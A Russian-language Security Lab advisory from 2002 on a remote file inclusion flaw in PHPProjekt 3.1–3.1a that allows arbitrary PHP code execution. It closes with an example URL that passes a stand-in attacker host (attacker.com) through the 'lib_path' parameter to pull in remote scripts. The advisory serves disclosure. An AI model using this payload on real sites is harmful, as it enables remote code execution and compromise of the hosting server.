Security Lab

Выполнение произвольного PHP кода в PHPproject

Дата публикации:19.03.2002
Дата изменения:17.10.2006
Всего просмотров:1321
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: PHPProjekt - свободно доступный пакет PHP Groupware от PHPProjekt для Linux, Unix и Microsoft Windows.

Уязвимость в PHPProjekt позволяет нападающему включать произвольные файлы расположенные на удаленном сервере. Если включенный файл - PHP сценарий, то уязвимость позволяет выполнение произвольного кода.

Успешная эксплуатация этой проблемы частично зависит от конфигурации PHP на хосте, выполняющем уязвимое программное обеспечение. Если 'all_url_fopen' установлен в 'off', тогда эксплуатации этой проблемы ограничена.

Уязвимость найдена в PHPProjekt 3.1-3.1a

Пример: http://site.com/filemanager/filemanager_forms.php?lib_path=http://attacker.com/nasty/scripts

Ссылки: Источник